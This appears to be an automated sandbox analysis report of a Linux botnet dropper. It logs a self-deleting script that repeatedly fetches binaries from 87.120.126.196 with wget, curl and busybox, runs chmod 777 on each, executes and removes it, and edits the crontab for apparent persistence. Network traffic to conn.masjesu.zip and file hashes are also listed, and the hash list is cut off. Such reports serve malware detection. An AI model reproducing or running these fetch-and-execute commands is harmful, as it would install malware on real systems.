File opened for modification /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif /bin/busybox N/A
File opened for modification /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK /bin/busybox N/A
File opened for modification /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem /usr/bin/wget N/A
File opened for modification /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj /bin/busybox N/A
File opened for modification /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 /bin/busybox N/A
File opened for modification /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj /bin/busybox N/A
File opened for modification /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i /usr/bin/curl N/A
File opened for modification /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i /bin/busybox N/A
File opened for modification /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E /usr/bin/wget N/A
File opened for modification /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby /bin/busybox N/A
File opened for modification /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby /bin/busybox N/A
File opened for modification /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D /bin/busybox N/A
File opened for modification /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem /bin/busybox N/A
File opened for modification /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E /bin/busybox N/A
File opened for modification /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV /usr/bin/wget N/A
File opened for modification /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i /bin/busybox N/A
File opened for modification /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F /usr/bin/wget N/A
File opened for modification /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV /bin/busybox N/A
File opened for modification /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA /bin/busybox N/A
File opened for modification /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 /bin/busybox N/A
File opened for modification /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV /bin/busybox N/A
File opened for modification /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem /bin/busybox N/A
File opened for modification /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj /usr/bin/curl N/A
File opened for modification /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F /usr/bin/curl N/A
File opened for modification /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D /bin/busybox N/A
File opened for modification /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb /bin/busybox N/A
File opened for modification /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe /bin/busybox N/A
File opened for modification /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F /bin/busybox N/A
File opened for modification /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i /usr/bin/wget N/A
File opened for modification /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV /usr/bin/curl N/A
File opened for modification /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK /bin/busybox N/A
File opened for modification /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E /bin/busybox N/A
File opened for modification /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb /bin/busybox N/A
File opened for modification /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe /bin/busybox N/A
File opened for modification /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj /usr/bin/wget N/A
File opened for modification /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F /bin/busybox N/A
File opened for modification /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E /usr/bin/curl N/A

Processes

/tmp/bins.sh

[/tmp/bins.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.126.196/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/bin/chmod

[chmod 777 b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem

[./b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/bin/rm

[rm b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/usr/bin/wget

[wget http://87.120.126.196/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/bin/chmod

[chmod 777 V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj

[./V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/bin/rm

[rm V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/usr/bin/wget

[wget http://87.120.126.196/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/bin/chmod

[chmod 777 Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i

[./Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/bin/rm

[rm Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/usr/bin/wget

[wget http://87.120.126.196/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/bin/chmod

[chmod 777 BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F

[./BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/bin/rm

[rm BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/usr/bin/wget

[wget http://87.120.126.196/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/bin/chmod

[chmod 777 HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E

[./HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/bin/rm

[rm HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/usr/bin/wget

[wget http://87.120.126.196/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/bin/chmod

[chmod 777 R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV

[./R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/bin/sh

[sh -c crontab -l]

/usr/bin/crontab

[crontab -l]

/bin/sh

[sh -c crontab -]

/usr/bin/crontab

[crontab -]

/bin/rm

[rm R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/usr/bin/wget

[wget http://87.120.126.196/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/bin/chmod

[chmod 777 NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby

[./NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/bin/rm

[rm NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/usr/bin/wget

[wget http://87.120.126.196/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/bin/chmod

[chmod 777 LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA

[./LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/bin/rm

[rm LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/usr/bin/wget

[wget http://87.120.126.196/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/bin/chmod

[chmod 777 yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D

[./yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/bin/rm

[rm yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/usr/bin/wget

[wget http://87.120.126.196/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/bin/chmod

[chmod 777 5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif

[./5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/bin/rm

[rm 5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/usr/bin/wget

[wget http://87.120.126.196/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/bin/chmod

[chmod 777 GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb

[./GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/bin/rm

[rm GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/usr/bin/wget

[wget http://87.120.126.196/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/bin/chmod

[chmod 777 pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe

[./pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/bin/rm

[rm pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/usr/bin/wget

[wget http://87.120.126.196/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/bin/chmod

[chmod 777 4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK

[./4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/bin/rm

[rm 4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/usr/bin/wget

[wget http://87.120.126.196/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/bin/chmod

[chmod 777 NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68

[./NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/bin/rm

[rm NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/usr/bin/wget

[wget http://87.120.126.196/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/bin/chmod

[chmod 777 Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i

[./Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/bin/rm

[rm Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/usr/bin/wget

[wget http://87.120.126.196/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/bin/chmod

[chmod 777 BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F

[./BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/bin/rm

[rm BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/usr/bin/wget

[wget http://87.120.126.196/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/bin/chmod

[chmod 777 HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E

[./HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/bin/rm

[rm HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/usr/bin/wget

[wget http://87.120.126.196/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/bin/chmod

[chmod 777 R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV

[./R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/bin/rm

[rm R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/usr/bin/wget

[wget http://87.120.126.196/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/bin/chmod

[chmod 777 NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby

[./NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/bin/rm

[rm NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/usr/bin/wget

[wget http://87.120.126.196/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/bin/chmod

[chmod 777 LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA

[./LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/bin/rm

[rm LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/usr/bin/wget

[wget http://87.120.126.196/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/bin/chmod

[chmod 777 yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D

[./yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/bin/rm

[rm yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/usr/bin/wget

[wget http://87.120.126.196/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/bin/chmod

[chmod 777 5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif

[./5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/bin/rm

[rm 5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/usr/bin/wget

[wget http://87.120.126.196/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/bin/chmod

[chmod 777 GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb

[./GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/bin/rm

[rm GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/usr/bin/wget

[wget http://87.120.126.196/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/bin/chmod

[chmod 777 pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe

[./pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/bin/rm

[rm pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/usr/bin/wget

[wget http://87.120.126.196/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/bin/chmod

[chmod 777 4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK

[./4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/bin/rm

[rm 4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/usr/bin/wget

[wget http://87.120.126.196/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/bin/chmod

[chmod 777 NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68

[./NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/bin/rm

[rm NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/usr/bin/wget

[wget http://87.120.126.196/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/bin/chmod

[chmod 777 b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem

[./b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/bin/rm

[rm b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/usr/bin/wget

[wget http://87.120.126.196/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/bin/chmod

[chmod 777 V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj

[./V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/bin/rm

[rm V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

Network

Country Destination Domain Proto
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:443 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp
BG 87.120.126.196:80 conn.masjesu.zip tcp

Files

/tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem

MD5 64ece99ca4ab1c1405f5a3335d64a960
SHA1 b7395f2320a5bdadb78943b268708965cdbd1d74
SHA256 aaf14287d7a971d4541527262e85e5930bbb7f506cff4808d712843be9f05dae
SHA512 bc169075e50ceffd0ce0cc90513bc2f0d8696c01d4132609e31c782ea6c0a755505891e2e23676dd63c3dd00bf97599a9a7e6230e8c3f5166202f5b9be606d41

/tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj

MD5 3b78bb645b81d600c30713d416f666be
SHA1 23796112f2cce2afb2217498b5ecf2801ab550f2
SHA256 d52f8bcb15a590aa5624c446091f1cd0705b68e4647debaeecf8cfa1fe425bd2
SHA512 9532ede2d78f1f62f291c8d8d4023c9c579a0bdd042ca11af179adcab96ac2eb178ecb34b9e4b99a33f828694b9839abebabd2ef57dd36d1936027bad1987cf9

/tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i

MD5 c20c610e14b8e59f5f8258a55fe7f27d
SHA1 e59a0b83d9882f2770f052a213cad25b0cbd53fc
SHA256 adb7828df990cedc9f301891e725c547656967d827ce9cfdf3f6e8fa8242618b
SHA512 dd8d992edcb5e4dae5e97a1ad12c28560a2cda02dcc1867250de78b0fe0d0f511b7269cb4999c80d6d299b87145bcef5b1587730b496426f14550b6f7a0a59a2

/tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F

MD5 22c527269cbd9b42f4ade79f52757efb
SHA1 c2456188a49af93b0d07af2a7cc1346d5be510bd
SHA256 100042d7138b4348a13c54c191d501d125b7fea7631382e7d0e9d7251057ce97
SHA512 7b7cb4d8307c0437163cdbfa349f1285cfa26c25ec856f8b4d4cebf8f71cae87e74de8f3c0f29ef2789168a4499bfe95007d7d524ed734e3eb4ac0d0e4e09b53

/tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E

MD5 d8e96e2fdd3c610ec19128e18de5abde
SHA1 10cf691ae9779bfeca8b67e75721d0a6f275e4f9
SHA256 f09f8db2883da603f963189ef3b8185b179832de8b2e526ef63fe8b96847cc7b
SHA512 979e0f29d7b65fcf7c4d93ec6fdaa70cdd26d9fa8a526fee7d4cdb028229db06186f89c9b0c93d3112e636c1b65819d46695310c90a1700343c2221df9323592

/tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV

MD5 52f72bcf31899453b40d37a7cbf55f35
